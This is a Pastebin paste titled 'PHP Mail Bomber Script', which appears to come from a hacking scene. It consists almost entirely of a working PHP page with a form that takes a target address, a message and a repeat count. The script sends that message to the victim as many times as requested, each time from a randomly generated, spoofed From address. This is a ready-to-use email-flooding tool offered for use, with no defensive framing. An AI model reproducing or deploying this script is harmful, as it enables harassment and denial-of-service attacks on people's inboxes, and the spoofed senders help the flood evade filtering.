Advertisement
Guest User

PHP Mail Bomber Script bY BLACK BURN

a guest
Dec 20th, 2011
3,885
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.52 KB | None | 0 0
  1. <style type="text/css">
  2. <!--
  3. body,td,th {
  4. color: #999999;
  5. font-family: Courier New, Courier, monospace;
  6. }
  7. body {
  8. background-color: #000000;
  9. }
  10. INPUT {
  11. background-color: black;
  12. border: grey 1px solid;
  13. color: white;
  14. font-family: arial, verdana, ms sans serif;
  15. font-size: 10pt
  16. }
  17. TEXTAREA {
  18. background-color: black;
  19. border: grey 1px solid;
  20. color: white;
  21. font-family: arial, verdana, ms sans serif;
  22. font-size: 10pt;
  23. font-weight: normal
  24. }
  25. -->
  26. </style>
  27. <?php
  28. if (isset($_REQUEST['message']))
  29. {
  30. $message = $_REQUEST['message'] ;
  31. $email = $_REQUEST['email'] ;
  32. $times = $_REQUEST['times'] ;
  33. $subject = $_REQUEST['subject'] ;
  34. $to = $_REQUEST['to'] ;
  35. for ($i=1; $i<=$times; $i++)
  36. {
  37. mail( "$to", "$subject", $message, "From:" . rand() . "@$email" ) ;
  38. }
  39. echo "sent... o.O";
  40. }
  41. else
  42. {
  43. echo "<form method='post' action='index.php'>
  44. <p align='left'>
  45. Times to send:<br />
  46. <input name='times' type='text' value='1' size='4' maxlength='5' />
  47. <br />
  48. <Input name='email' type='text' value='email suffix' />
  49. <br />
  50. <input name='to' type='text' value='To' />
  51. <br />
  52. <input name='subject' type='text' value='Subject' />
  53. <br />
  54. <br />
  55. Message:<br />
  56. <textarea name='message' rows='15' cols='40'></textarea>
  57. <br />
  58. <br />
  59. <input type='submit' name='send' value='send' />
  60. <input name='reset' type='reset' value='reset' />
  61. </p>
  62. </form>";
  63. }
  64. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement